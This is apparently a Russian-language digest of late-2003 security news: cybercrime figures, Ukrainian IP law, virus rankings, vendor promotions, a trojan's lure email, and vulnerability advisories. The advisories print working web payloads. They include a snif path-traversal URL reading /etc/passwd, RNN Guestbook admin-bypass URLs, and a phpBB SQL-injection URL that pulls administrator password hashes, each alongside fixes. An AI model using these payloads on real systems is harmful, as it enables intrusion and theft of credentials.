Отчет, подготовленный лондонской компанией, специализирующейся на преступлениях в информационной сфере, может еще больше напугать предприятия и фирмы, и без того обеспокоенные быстрым распространением этого феномена, который, по мнению многих наблюдателей, уже вышел из-под контроля. Хакеры перебрасывают деньги с одного банковского счета на другой, перехватывают секретную информацию о планах, контрактах, альянсах, слияниях, похищают секретные данные о продуктах, которые еще не появились на рынке, воруют, меняют и продают конфиденциальные сведения, подрывают принципы свободной конкуренции, занимаются распространением вирусов и червей: список преступлений компьютерных воров-шпионов продолжает расти.

Эти профессионалы - цвет киберпространства. Они используют в своих целях скрытые слабости соперников. Они почти неуловимы. «Они невероятно предприимчивы, - говорит один из ведущих нью-йоркских консультантов. - Этот новый тип преступников продолжает оттачивать свою технику, и глобальная сеть стала их заложницей». Никогда раньше не регистрировалось 20 тысяч взломов в месяц по всей планете, это рекорд по сравнению с 16 тысячами взломов сетей за один месяц в середине 2002 года.

Сотрудникам ФБР удалось опросить 500 фирм, обеспечивающих информационную безопасность, и 80% опрошенных сообщили о том, что они являлись объектами компьютерных атак и потеряли в среднем от 2 до 6,5 млн долл.
0

Уже в следующем году Украина намерена вступить во Всемирную торговую организацию (ВТО), а одним из ключевых условий этого является гармонизация нашего законодательства в сфере охраны интеллектуальной собственности с международными нормами. Ведь, по законам рынка, продукт работы "серого вещества" -- это такой же товар, как творение человеческих рук.

"В целом отечественная правовая структура уже отвечает требованиям ВТО, остается лишь "отшлифовать" некоторые нормы, -- отмечает первый зампредседателя Госдепартамента интеллектуальной собственности Владимир Жаров. -- Мы вплотную подошли к выполнению соглашения с ЕС, по которому Украина должна создать такие же условия в защите интеллектуальной собственности, какие действуют в странах Евросоюза. Верховная Рада приняла комплексный закон о внесении соответствующих изменений в законы об авторских и смежных правах, об охране прав на изобретения, о товарных знаках и т. д. Это специфическое законодательство приводится в соответствие с Хозяйственным, Гражданским, Уголовным и Административным кодексами, включая усиление уголовной ответственности за нарушение прав на объекты интеллектуальной собственности. Кстати, сейчас ежемесячно по стране открывается до десятка уголовных дел в отношении таких нарушителей. Функции государства -- не просто выработать совершенные "правила игры", но и добиться их выполнения. И здесь создана четкая административная система: мы не только регистрируем права собственности, в регионах госинспекторы Департамента в сотрудничестве с МВД, ГНАУ, Антимонопольным комитетом и Гостаможслужбой контролируют их исполнение".

"Правительство выполняет роль "локомотива" по вступлению нашей страны в ВТО, -- говорит вице-президент Украинской ассоциации владельцев товарных знаков Михаил Дубинский. -- Вполне логично, что только в этом году оно выдало около десяти нормативно-правовых актов, направленных на разработку механизмов защиты интеллектуальной собственности в соответствии с международными стандартами. Важнейшая задача для обретения членства в ВТО -- гармонизировать наше законодательство с положениями Соглашения о торговых аспектах прав интеллектуальной собственности -- решается во многом благодаря активной позиции правительства".

Интересный момент: Кабмин начал борьбу с широко распространенным у нас использованием пиратских компьютерных программ... с себя. Постановлением правительства все органы исполнительной власти к 24 марта 2004-го должны подготовиться к переходу исключительно на лицензионные программные продукты.

А как наши ученые, композиторы и прочие творческие люди могут реально защитить свои творения от нелегального использования? "Для этого достаточно заключить с нами соглашение, -- отвечает директор Украинского агентства по авторским и смежным правам Сергей Бондаренко. -- Мы представляем интересы уже более 3000 авторов, в том числе обеспечиваем их юридическую защиту в Украине и за рубежом. Так, Российское авторское общество от имени нашего Агентства ведет несколько судебных дел с театрами в РФ о незаконной постановке пьес украинских драматургов. А главное, мы обеспечиваем право автора на получение вознаграждения (роялти) за использование его произведений: за 2 последних года суммы таких сборов возросли в 5 раз. Сам композитор, например, не может проконтролировать, какие FM-радиостанции, телеканалы, бары или ночные клубы используют его песни для создания "приятной атмосферы", а значит, должны платить автору. Это -- наша функция. Кстати, решением правительства ставки роялти увеличены: с дохода, полученного в связи с использования авторского произведения, кафе и рестораны должны отчислять минимум 1%, а кабельное TV -- 5%".

Любители "продать чужой талант" не ограничиваются фальсифицированием "раскрученных" торговых марок или тиражированием пиратских компакт-дисков. Они уже и популярных артистов "подделывают". Вот что рассказала патентный поверенный Ирина Ошарова: "Мы ведем очень показательное дело о нарушении авторских прав Андрея Данилко. Ответчик во время публичных выступлений неправомерно использовал сценический образ Верки Сердючки и авторские диски с песнями А. Данилко. Изучив представленные доказательства, Печерский райсуд г. Киева вынес решение: такое подражание творчеству незаконно и должно быть прекращено. Пусть это имеют в виду те, кто продолжает "клонирование" образа известного артиста".

Итак, на разномастных нарушителей в этой сфере уже есть управа. Но и законным владельцам этих прав не стоит сидеть сложа руки -- мол, рано или поздно справедливость восторжествует. Хрестоматийный пример похвальной активности: автор известного памятного знака "Кий, Щек, Хорив и Лыбедь" отсудил у тех, кто незаконно использовал изображение его творения, во много раз большую сумму, чем составил сам гонорар за скульптурную группу.

1

Ноябрьская двадцатка самых распространенных вирусов отмечена появлением сразу нескольких вариантов сетевого червя Mimail, самый "успешный" из которых, I-Worm.Mimail.c, возглавил "хит-парад" с показателем в 34.57% от общего числа зарегистрированных инцидентов. Всего в ноябре появилось шесть новых модификаций Mimail, которые в сумме набрали около 62%. Это было вызвано тем, что исходные тексты первого червя семейства Mimail были опубликованы в интернете.

Mimail удалось потеснить лидера прошлого месяца, I-Worm.Swen, на третье место в вирусной статистике, а безусловный лидер 2003 года - Sobig.f опустился на 11 место. Свою роль в этом сыграло и возвращение в список "старых знакомых" - червей семейства Klez и Lentin.

Также вернулись в 20-ку черви Dumaru и Lovelorn, причем Dumaru.A сразу же занял 8 место.

Смог укрепить свои позиции немецкий червь Sober, поднявшийся за месяц на две позиции, с 6 на 4 место.

Значительно уменьшилось число троянских программ, на этот раз в рейтинге всего две вредоносные программы этого типа (утилиты несанкционированного управления - backdoor) - Agobot и SdBot, да и те потеряли 7 и 14 мест соответственно и замыкают собой вирусную двадцатку ноября.

Таким образом, сетевые черви окончательно монополизировали вирусную статистику, отдав "троянцам" чуть более полпроцента рейтинга. Компьютерные вирусы впервые вообще покинули двадцатку.

В двадцатке появились следующие новые вредоносные программы: черви семейства Mimail - c,e,f,g,h,j, и Hawawi.g. Повысил свой рейтинг только Sober. Понизили свои показатели Swen, Mimail.a, Sobig.f, Tanatos.b, Lovesan, Agobot, SdBot. В хит-парад вернулись Klez.h, сразу две версии Lentin, Dumaru.a и Lovelorn.

"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, и компания "Софткей" - владелец крупнейшей системы регистрации продаж программного обеспечения на территории России, Украины и Казахстана, объявляют о начале совместной маркетинговой акции "Новогодняя Лавина Подарков". По условиям программы каждый покупатель продукта "Лаборатории Касперского", оформивший приобретение в онлайн-магазине компании в период с 1 декабря 2003 г. по 15 января 2004 г. в., бесплатно получает в подарок ценные призы с фирменной символикой.

В то же время вплоть до 31 декабря 2003 года сохраняет свою силу ритейл-программа "Осенний листопад цен". В рамках данной акции пользователям из России, стран СНГ и Балтии предоставляется возможность приобрести по специальной цене Антивирус Касперского Personal 4.5, а также объединенный пакет из Антивируса Касперского Personal Pro 4.5 и Kaspersky Anti-Hacker для организации комплексной защиты своего домашнего компьютера от внешних угроз.

"Учитывая приближение Нового Года, мы хотим сделать процесс приобретения продуктов "Лаборатории Касперского" максимально приятным для каждого покупателя. Мы надеемся, что красочно и выразительно оформленные подарки от нашей компании найдут свое применение и помогут создать праздничное настроение у всех новых пользователей", отметил Денис Зенкин, руководитель информационной службы "Лаборатории Касперского".

Дополнительная информация по условиям и преимуществам участия в акции "Новогодняя лавина подарков" доступна по адресу http://www.kaspersky.ru/nypromo.html

"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, объявляет о продлении срока действия сертификата качества Checkmark для Антивируса Касперского®. Checkmark - это многоуровневая процедура испытания программных и аппаратных комплексов компьютерной безопасности, характеризующая их соответствие требуемым стандартам качества. Определение критериев качества продуктов, а также проведение тестирования осуществляется независимой испытательной лабораторией британского научно-исследовательского центра West Coast Labs (www.check-mark.com).

На сегодняшний день West Coast Labs проводит тестирование антивирусных программ по трем уровням сертификации - Level 1, Level 2 и Trojan Checkmark на различных версиях операционной системы Windows. Успешное прохождение Level 1 подтверждает, что продукт показал 100% результат в обнаружении всех зарегистрированных независимой международной организацией "Wildlist" (www.wildlist.org) компьютерных вирусов.

Завершение Level 2 доказывает 100% эффективность антивируса в области лечения вирусов из списка "Wildlist", что подразумевает способность продукта к восстановлению оригинального содержимого инфицированных файлов и загрузочных секторов и сохранению их первоначальной работоспособности. Наконец, уровень Trojan Checkmark удостоверяет корректное обнаружение всех троянских программ из коллекции West Coast Labs.

Антивирус Касперского успешно прошел все три тестовых этапа, продлив срок действия сертификата Checkmark.

Полный список сертификатов "Лаборатории Касперского" приведен по этому адресу.

Совет Федерации федерального собрания РФ намерен создать рабочую группу по законодательному обеспечению информационного развития России. Такая рекомендация принята по итогам "круглого стола", состоявшегося сегодня в Совете Федерации.

"Круглый стол" с участием членов Совета Федерации, представителей Минсвязи РФ и МАП РФ, ведущих телекоммуникационных компаний и научных организаций был проведен по инициативе комиссии Совета Федерации по естественным монополиям. В качестве основной задачи группы определена разработка программы законотворческой деятельности по обеспечению реализации национальной стратегии информационного развития России. В частности, предполагается разработать проекты федеральных законов "О государственной политике в телекоммуникационной отрасли", "Об Интернете", "Об электронном документообороте".

Руководство австралийской компании Ezysend, предлагающей в интернете фрахтовые услуги, уволило менеджера департамента маркетинга за рассылку спама. Таким образом сотрудник занимался продвижением услуг Ezysend, сообщает ZDnet.

По словам управляющего директора Ezysend Даррена Гибсона (Darren Gibson) уволенный менеджер занимался рассылкой спама без разрешения совета директоров компании. В связи с этим Гибсон предупредил руководителей других компаний о необходимости взвешенного подхода к проведению маркетинговых акций в интернете.

Гибсон особо отметил, что Ezysend придерживается жесткой антиспамовой политики. В трудовом договоре менеджеров отдела маркетинга даже указан специальный пункт, запрещающий использовать спам для продвижения компании на рынке. Нарушение именно этого пункта и стало основанием для увольнения недобросовестного сотрудника.

Спам с описанием услуг фрахтовой компании рассылался пользователям с серверов сторонней организации, то есть был оплачен уволенным менеджером из бюджета Ezysend. Чтобы избежать подобных прецедентов в дальнейшем Гибсон намеревается ужесточить контроль за расходами отдела маркетинга.

В настоящее время рассылка спама пока еще является в Австралии легальной деятельностью. Однако уже до конца этого года австралийский сенат должен утвердить последнюю редакцию закона о запрете массовой несанкционированной рассылки.

Шесть мошенников получили срок в 15 лет. Группа использовала Британский сайт аукциона, чтобы выставлять на продажу здания, после смерти владельцев.

Они собирали информацию относительно прежних владельцев с другого официального сайта и использовали ее, чтобы изобразить из себя прежнего владельца и оформлять сделки.

Масштаб мошенничества был раскрыт только после того, как один из обманутых банков вошел в контакт с полицией. Следствие показало, что несколько других учреждений были обмануты, но предпочли сохранить лицо и промолчать о потерях.

Банки зажаты между необходимостью совершать сделки быстрее конкурентов и стоимостью возможно большего количества проверок подлинности плательщиков. Именно поэтому полиция считает, что войну против мошенников невозможно выиграть без объединения усилий.

Новый троян изображает из себя колоритное приложение к электронной почте. Sysbug-A замаскирован как файл-вложение, содержащее откровенные изображения молодой пары. Будучи запущенным пользователем, он позволяет хакерам получить контроль над зараженным компьютером.

Как обычно, Sysbug-A инфицирует только машины под управлением Windows. Инфицированный e-mail обычно приходит со строкой в теме "Re [2]: Мэри" и вложенным файлом private.zip, который содержит вирус, называющийся "wendynaked.jpg.exe", и следующий текст:

Hello my dear Mary,
I have been thinking about you all night. I would like to apologize for the other night when we made beautiful love and did not use condoms. I know this was a mistake and I beg you to forgive me.

I miss you more than anything, please call me Mary, I need you. Do you remember when we were having wild sex in my house? I remember it all like it was only yesterday. You said that the pictures would not come out good, but you were very wrong, they are great. I didn't want to show you the pictures at first, but now I think it's time for you to see them. Please look in the attachment and you will see what I mean.

I love you with all my heart, James.

I. В номинации «Интегрированные системы безопасности».

• Диплом первой степени. ООО «СИГМА – ИС». Интегрированная система безопасности «Рубеж».
• Диплом второй степени. ЗАО «ТЕХНОЛИНК». Комплекс технических средств «Амулет».

II. В номинации «Системы охранного телевидения и наблюдения».

• Диплом первой степени. Консорциум «ИНТЕГРА-С». Интегрированная интеллектуальная система «Интегра-Видео».
• Диплом второй степени. ЗАО НПО «ЛАБИ». Система видеосерверов «Pandora».
• Диплом второй степени. ООО «БИК – ИНФОРМ». Комплект передачи видеосигнала по оптоволокну OVT/OVR – 01.

III. В номинации «Системы охранной и пожарной сигнализации».

• Диплом первой степени. ЗАО «АРГУС-СПЕКТР». Серия пожарных извещателей «Аврора».
• Диплом первой степени. ООО «АКВАТЕН». Система УПО – 09 Ф («Нерпа»).
• Диплом второй степени. ЗАО НПП «БОЛИД». Комплекс централизованной охраны.

IV. В номинации «Системы контроля и управления доступом».

• Диплом первой степени. ЗАО «МЕТАКОМ». Серия изделий МК.
• Диплом второй степени. Компания «ЛУИС ПЛЮС». Система контроля и управления доступом «Elsys».

V. В номинации «Специальные технические средства».

• Диплом первой степени. ООО «КОМПАНИЯ Т и Т ИНТЕРНЕШНЛ».
• Многоканальная система регистрации телефонных и диспетчерских переговоров «Drag-Net».

VI. В номинации «Системы и средства защиты информации».

• Диплом первой степени. ЗАО «НПП ИТБ». КЗСИ «Панцирь».
• Диплом второй степени. ЗАО «АННА». Генератор «Соната – PC 1».
• Диплом второй степени. ООО «ЛАБОРАТОРИЯ ППШ». Генератор «ЛГШ – 501».

VII. В номинации «Системы и средства пожарной безопасности».

• Диплом первой степени. ЗАО «ИНЖЕНЕРНЫЙ ЦЕНТР ЭФЭР». Серия изделий ЛС–20, ЛС–40, ЛС-60, ЛС-100.
• Диплом второй степени. ООО «ГЕФЕСТ». Ороситель «Аквамастер».

VIII. В номинации «Системы оперативной связи, оповещения и сигнально – звуковое оборудование».

• Диплом первой степени. ООО «СИСТЕМСЕРВИС». Система оповещения «Блюз».
• Диплом второй степени. ООО «ВИЗИТ ПЛЮС». Система оповещения на базе GSM.

Программа: Apache mod_python 3.x до версии 3.0.4, 2.x до версии 2.7.9 Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Apache mod_python модуле в обработке некоторых строк запроса. Удаленный пользователь может вызвать отказ в обслуживании. Удаленный пользователь может послать специальную строку запроса, которая при обработке модулем mod_python аварийно завершит работу Apache httpd процесса. Дополнительные подробности не раскрываются. URL производителя: http://www.modpython.org/ Решение:Установите обновленную версию модуля: http://httpd.apache.org/modules/python-download.cgi

Mod_python 3.0.4 and 2.7.9

Программа: RNN Guestbook 1.2 Опасность: Высокая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в RNN Guestbook. Удаленный пользователь может получить административный доступ к приложению и выполнить произвольные команды на системе. Удаленный пользователь может обойти авторизацию и напрямую использовать административные функции через 'gbadmin.cgi' сценарий. Примеры: gbadmin.cgi?action=change_adminpass (to change the administrative password) gbadmin.cgi?action=delete_guests (to delete all guestbook posts) gbadmin.cgi?action=setup (to modify guestbook setup information) gbadmin.cgi?action=colors (to change the guestbook colors) gbadmin.cgi?action=change_automail (to change emailing information) Удаленный авторизованный пользователь (или пользователь, эксплуатирующий первую уязвимость) может читать произвольные файлы на системе с привилегиями Web сервера, используя 'gbadmin.cgi?action=setup' URL и изменяя 'guestbook entry file' к произвольному имени файла на системе. Затем удаленный пользователь может использовать 'guestbook.cgi', чтобы просмотреть содержание произвольного файла. Также сообщается, что программное обеспечение хранить пароль администратора в 'gbpass.pl' файле. Локальный пользователь может просматривать пароль. URL производителя:://www.cbvfd.com/rnn/scripts/guestbook.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

RNN's Guestbook 1.2 Multiple Vulnerabilities

Программа: snif 1.2.5 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в 'simple and nice index file' (snif) приложении. Удаленный пользователь может просматривать файлы на сервере. Удаленный пользователь может определить абсолютный путь и имя файла для параметра 'download' в index.php файле, чтобы просматривать произвольные файлы на целевой системе с привилегиями Web сервера. Пример/Эксплоит: http://[target]/snif/index.php?download=/etc/passwd URL производителя:://www.bitfolge.de/index.php?l=en&s=snif Решение:Производитель выпустил обновленную версию программы (1.2.5): http://www.bitfolge.de/download/snif_125.zip

Snif 1.2.4 file retrieval bug

Паспортная служба Великобритании будет использовать биометрические средства уже к концу следующего года. Это станет первым шагом на пути к оснащению паспортов компьютерными чипами в 2005 году.

Используя фотографию человека, технология производит математическое сравнение измерений между точками на лице. С конца 2004 года биометрическая информация с фотографий, поданных с заявлениями на паспорт, будет сравниваться с базой данных известных преступников, сообщил глава Паспортной службы Великобритании Бернард Хердан.

"Это та же технология, которая будет использоваться для оснащения паспортов чипами в последующем. После внедрения проверка будет трехсторонней - пограничники смогут сравнивать человека, стоящего перед ними с информацией на микросхеме и фотографией", - сказал он.

Схема является частью целого ряда планов по борьбе с подделкой паспортов. Ключевым элементом будет база утерянных, украденных и найденных паспортов, данные которой, помимо Паспортной службы Великобритании, будут предоставляться пограничным службам других стран, чтобы сделать невозможным использование ворованных паспортов.

Информация будет распространяться с использованием сети Omnibase, которая устанавливается в настоящее время в посольствах Соединенного королевства по всему миру.

Компания Microsoft рассматривает возможность выпуска компакт-дисков с обновлениями для своих операционных систем. В настоящее время софтверный гигант готовится начать бета-тестирование новой схемы распространения патчей. В письме, разосланном потенциальным тестерам, говорится о том, что прием заявок на участие в тестировании будет проводиться до 5 декабря 2003 года.

В рамках бета-тестирования на компакт-дисках будут выпускаться обновления только для операционных систем Windows 98, 98SE и Me. На дисках будут записываться критические обновления, в настоящее время доступные через службу Windows Update. В письме к бета-тестерам говорится, что такая схема распространения обновлений предназначена, в первую очередь, для пользователей с медленными подключениями к интернету или вовсе без таковых. Кроме того, обновления на CD могут показаться некоторым пользователям более удобными, чем загрузка патчей из интернета.

О том, когда обновления на компакт-дисках начнут поставляться конечным потребителям, пока неизвестно. Неясно также, будут ли аналогичные обновления выпускаться для более современных операционных систем Windows 2000 и XP. Однако то, что выпуск обновлений к Windows на компакт-дисках окажется полезным, сомнению не подлежит. В последнее время Microsoft часто говорит о своей приверженности обеспечению безопасности своих программных продуктов. При этом компания не раз подвергалась критике за то, что критически важные обновления доступны только через интернет, что затрудняет ликвидацию дыр для многих пользователей.

На компьютерной выставке Comdex, компания Computer Associates заявила о том, что намерена бесплатно предоставлять свой брандмауэр и антивирус eTrust EZ-Armor всем заинтересованным частным пользователям персональных компьютеров в течение одного года. В то же время, различным фирмам и компаниям это ПО по-прежнему будет предоставляться на платной основе.

Как заявил Тоби Вайсс, страший вице-президент Computer Associates, этот жест доброй воли проводится в рамках поддержки очередной кампании Microsoft c красноречивым названием Protect Your PC ("Защити свой компьютер"), главной целью которой является повышение общего уровня безопасности Всемирной сети. Согласно статистике, приведенной Computer Associates, сейчас в мире ежемесячно приходятся 105 заражений вирусами на 1000 компьютеров, тогда как в 1998 году этот показатель был равен всего 32.

В среду правительства стран-членов Евросоюза приняли положительное решение относительно создания агентства по защите пользователей Всемирной сети от различных онлайновых преступлений, сообщает агентство Associated Press.

В функции агентства будет входить предупреждение пользователей о компьютерных вирусах, фактах кражи персональной информации и других правонарушениях в Сети, а также защита компьютерных систем и баз данных от возможных вторжений.

Планируется, что Европейское агентство по защите сетевой информации начнет свою деятельность в первой половине 2004 года. Эркки Лийканен, уполномоченный Евросоюза по вопросам информации заявил, что "доверие и безопасность являются важными составляющими нормальных взаимоотношений в информационном обществе".

По мнению членов Еврокомиссии, решение о создании такого агентства на межгосударственном уровне принято по причине того, что "проблемы безопасности сетевой информации также не имеют границ, как и сами информационные потоки".

Описание: Несколько уязвимостей обнаружено в OpenCA в использовании цифровых сигнатрур. Удаленный атакующий может обойти enforce role-based access control (RBAC) правила. OpenCA может использовать неправильный сертификат в цепочке, который может вызвать отклоненный или истеченный сертификат, который будет принят как допустимый сертификат. Библиотека 'crypto-utils.lib' некорректно использует OpenCA::PKCS7 (the OpenCA PKCS#7 module). Та же самая библиотека также использует все сертификаты, которые являются частью сигнатуры, чтобы создать X.509 объект сертификата подписывающего лица, которое может содержать "случайные" результаты. Также сообщается, что 'OpenCA::PKCS7' включает некорректное регулярное выражение, чтобы определить, какие строки сертификата не связанны с цепочкой сертификата. Также сообщается, что сериал в цепочке сертификата анализируется с неправильным регулярным выражением в 'OpenCA::PKCS7', в результате чего игнорируются заглавные буквы. URL производителя: http://www.openca.org/ Решение:Установите обновленную версию программы (0.9.1.4): http://www.openca.org/openca/downloads.shtml

[OpenCA Advisory] Vulnerabilities in signature verification

Программа: Microsoft Exchange 2003 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Microsoft Exchange 2003, когда он используется с Outlook Web Access и Windows SharePoint Services. Система может предоставить удаленному авторизованную пользователю доступ к почтовому ящику случайного пользователя. URL производителя: http://www.microsoft.com/ Решение:Используйте Kerberos Authentication с Windows® SharePoint™ Services, как описано в статье: http://www.microsoft.com/exchange/support/e2k3owa.asp

Exchange 2003 OWA major security flaw

Программа: GNU Screen 4.0.1, 3.9.15 и более ранние версии Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в GNU Screen. Локальный пользователь может выполнить произвольный код, чтобы получить поднятые привилегии на целевой ситеме. Локальный пользователь может послать от 2 до 3 гигабайт данных к экрану целевого пользователя, чтобы вызвать целочисленное переполнение в параметре 'w_NumArgs' в 'ansi.c' и выполнить произвольный код с set user id (setuid) root привилегиями или (setgid) utmp group привилегиями, в зависимости от инсталляции программы. URL производителя: http://www.gnu.org/software/screen/screen.html Решение: Установите следующее неофициальное исправление: --- ansi.c.old 2003-11-15 18:04:12.000000000 +0200 +++ ansi.c 2003-11-15 18:04:51.000000000 +0200 @@ -559,7 +559,7 @@ { case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': - if (curr->w_NumArgs < MAXARGS) + if (curr->w_NumArgs >=3D 0 && curr->w_NumArgs < MAXARGS) { if (curr->w_args[curr->w_NumArgs] < 100000000) curr->w_args[curr->w_NumArgs] =3D --- resize.c.old 2003-11-27 02:55:07.000000000 +0200 +++ resize.c 2003-11-27 02:58:33.000000000 +0200 @@ -682,6 +682,17 @@ if (wi =3D=3D 0) he =3D hi =3D 0; =20 + if (wi > 1000) + { + Msg(0, "Window width too large, truncated"); + wi =3D 1000; + } + if (he > 1000) + { + Msg(0, "Window height too large, truncated"); + he =3D 1000; + } if (p->w_width =3D=3D wi && p->w_height =3D=3D he && p->w_histheight =3D= =3D hi) { debug("ChangeWindowSize: No change.\n");

GNU screen buffer overflow

Программа: phpBB 2.06 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в phpBB в 'search.php'. Удаленный пользователь может внедрить SQL команды, чтобы получить административный доступ к приложению. Как сообщается, сценарий 'search.php' не достаточно проверяет параметр 'search_id'. Удаленный пользователь может послать специально обработанное значение, чтобы выполнить произвольные SQL команды на целевом сервере, например, чтобы получить хэши паролей администратора. С хэшами паролей, удаленный пользователь может изменить свои куки, чтобы получить доступ к системе. Воздействие уязвимости зависит от версии используемой базы данных MySQL. Для определения уязвимости, выполните следующий запрос: http://your_site/phpBB2/search.php?search_id=1\ Если ваша система уязвима, то запрос выдаст SQL ошибку: SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\ AND session_id = '9c9052fd135c0cefb31ec4b5124060f7'' SELECT search_array FROM phpbb_search_results WHERE search_id = 1\\ AND session_id = '9c9052fd135c0cefb31ec4b5124060f7' Line : 693 File : /usr/local/www/data/phpBB2/search.php Эксплоит (боле подробное описание см. в источнике сообщения) (работает только в MySQL 4.x!): http://site.com/search.php?search_id=1%20union%20select%20concat(char (97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116 ,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97, 116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108, 105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58, 34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58 ,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49 ,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116, 111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97, 114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[id]/* URL производителя: http://www.phpbb.com Решение:Внесите изменения в search.php или обновите phpbb 2.06: fix this flaw please open search.php in any text editor. Find the following code (in the vanilla release of 2.0.6 this can be found around line 685): Code: if ( intval($search_id) ) { $sql = "SELECT search_array FROM " . SEARCH_TABLE . " WHERE search_id = $search_id AND session_id = '". $userdata['session_id'] . "'"; Replace it with the following: Code: $search_id = intval($search_id); if ( $search_id ) { $sql = "SELECT search_array FROM " . SEARCH_TABLE . " WHERE search_id = $search_id AND session_id = '". $userdata['session_id'] . "'"; .

Re: phpBB 2.06 search.php SQL injection phpBB 2.06 search.php SQL injection